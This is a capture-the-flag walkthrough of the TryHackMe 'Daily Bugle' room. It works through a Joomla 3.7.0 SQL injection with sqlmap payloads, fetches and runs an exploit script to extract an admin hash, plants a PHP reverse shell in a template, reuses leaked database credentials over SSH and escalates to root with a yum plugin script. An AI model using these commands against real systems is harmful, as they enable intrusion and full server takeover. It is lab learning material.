Introduction

The Daily Bugle room on TryHackMe plunges you into a thrilling Red Team scenario centered around a high-profile bank heist. Your mission is to investigate and uncover the culprits while navigating a mix of web and system challenges. This room combines Joomla web exploitation, SQL injection, and Red Hat Linux privilege escalation, providing a full-spectrum test of both web application and server-level hacking skills. It’s a perfect exercise for penetration testers looking to sharpen their reconnaissance, exploitation, and privilege escalation techniques in a realistic, hands-on environment.

Initial reconnaissance

I started the box with a standard port and service scan to get my bearings.

nmap -sV -sC <ip>

Nmap returned three open ports:

• 22/tcp — SSH (OpenSSH 7.4)
• 80/tcp — HTTP (Apache/2.4.6, PHP 5.6.40) — the web server identified itself as Joomla!.
• 3306/tcp — MySQL / MariaDB (unauthorized)

Port 80 was open, so I navigated to the web server to see what was exposed.

Question: Access the web server, who robbed the bank?
Answer: spiderman

Web enumeration

Next, I ran a directory brute-force with dirsearch to map out potential Joomla paths and locate an admin panel.

dirsearch -u <ip> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Output highlights showed multiple Joomla-related directories and, importantly, an administrator interface:

• /images/, /media/, /templates/, /modules/, /plugins/, /includes/, /language/, /components/, /cache/, /libraries/, /tmp/, /layouts/, /cli/
• /administrator/ — Joomla admin panel discovered

Let’s navigate to the administrator panel next.

Finding Joomla Version

While dirsearch was running I noticed a README.txt file and grabbed it with curl to see if it revealed anything useful.

curl -s http://<ip>/README.txt

It confirmed the site was running Joomla 3.7.0, which is useful for targeting known vulnerabilities.

Question: What is the Joomla version?
Answer: 3.7.0

This is a useful data point: older Joomla 3.7.x installs are known to have several vulnerabilities, so next I moved on to vulnerability research.

Vulnerability research — SQL Injection

A known SQL injection (Exploit-DB 42033) affects Joomla 3.7’s com_fields component via the list[fullordering] parameter. I used sqlmap to verify the vulnerability and enumerate databases:

sqlmap -u "http://10.201.99.224/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" \
  --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Output:

sqlmap identified the following injection point(s) with a total of 2547 HTTP(s) requests:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 3813 FROM(SELECT COUNT(*),CONCAT(0x7162767671,(SELECT (ELT(3813=3813,1))),0x716b767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 7977 FROM (SELECT(SLEEP(5)))ODsF)
---
[09:31:02] [INFO] the back-end DBMS is MySQL
[09:31:02] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:31:03] [INFO] fetching database names
[09:31:03] [INFO] retrieved: 'information_schema'
[09:31:03] [INFO] retrieved: 'joomla'
[09:31:03] [INFO] retrieved: 'mysql'
[09:31:03] [INFO] retrieved: 'performance_schema'
[09:31:04] [INFO] retrieved: 'test'
available databases [5]:
[*] information_schema
[*] joomla
[*] mysql
[*] performance_schema
[*] test
[09:31:04] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2507 times
[09:31:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.201.99.224'
[09:31:04] [WARNING] you haven't updated sqlmap for more than 1997 days!!!
[*] ending @ 09:31:04 /2025-09-21/

sqlmap confirmed the parameter was vulnerable and retrieved the following databases:

• information_schema
• joomla
• mysql
• performance_schema
• test

The backend DBMS is MySQL (MariaDB fork). Many HTTP 500 responses appeared — typical for error-based payloads — and results were logged for further use.

Exploit & admin hash extraction

I found an existing Joomla exploit and downloaded it:

wget https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py
python joomblah.py http://10.201.99.224/

This revealed Jonah’s password hash:

$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

I cracked it with John the Ripper using the RockYou wordlist:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Question: What is Jonah's cracked password?

Answer: spiderman123

Gaining Access — Joomla Admin & Reverse Shell

I logged in to the Joomla admin panel using Jonah’s credentials (jonah:spiderman123) via the /administrator directory.

Once inside, I navigated to Extensions > Templates > Templates and selected the Beez3 template.

To get a reverse shell, I cloned the PentestMonkey PHP reverse shell repository:

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cd php-reverse-shell

I started a listener on my machine:

nc -lnvp 1234

Then I opened index.php in the Beez3 template, replaced its content with the PHP reverse shell (configured with my IP and port), and saved it.

Browsing to the modified template triggered the reverse shell:

curl http://10.201.99.224/templates/beez3/index.php

And my listener received the connection:

~$ nc -lnvp 1234
Connection received on 10.201.99.224 43182
sh-4.2$

I was now on the server as the apache user.

Post-Exploitation

First, I listed /home to see which users existed. The only user present was jjameson, but I didn’t have permission to access their home directory, so user.txt couldn’t be read at this stage.

Next, I inspected the web directory:

cd /var/www/html
cat configuration.php

The Joomla configuration.php file revealed database credentials:

public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
public $dbprefix = 'fb9j5_';

Capturing the User Flag

Interestingly, the database password (nv5uz9r3ZEDzVjNu) also worked for the user jjameson. I logged in via SSH:

ssh [email protected]
Password: nv5uz9r3ZEDzVjNu

Once inside, I retrieved the user flag:

cat user.txt
27a260fe3cba712cfdedb1c86d80442e

The machine is a Red Hat-based system.

Post-Exploitation — Privilege Escalation

I checked sudo privileges:

sudo -l

Output revealed that jjameson can run yum as root without a password:

(ALL) NOPASSWD: /usr/bin/yum

I verified the OS version:

cat /etc/redhat-release
CentOS Linux release 7.7.1908 (Core)

Using GTFOBins, I found that jjameson could run yum with NOPASSWD, which allowed me to escalate privileges. I pasted the following code directly into the terminal:

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y

This gave me a root shell.

Capturing the Root Flag

Finally, I read the root flag:

cat /root/root.txt
eec3d53292b1821868266858d7fa6f79

Conclusion

The Daily Bugle room on TryHackMe was a challenging Red Team exercise that tested both web and system exploitation skills. From Joomla vulnerabilities and SQL injection to deploying a PHP reverse shell and escalating privileges on Red Hat Linux via GTFOBins, I successfully captured both user and root flags. This room highlights the importance of thorough enumeration, vulnerability research, and creative privilege escalation — an excellent challenge for anyone honing penetration testing skills.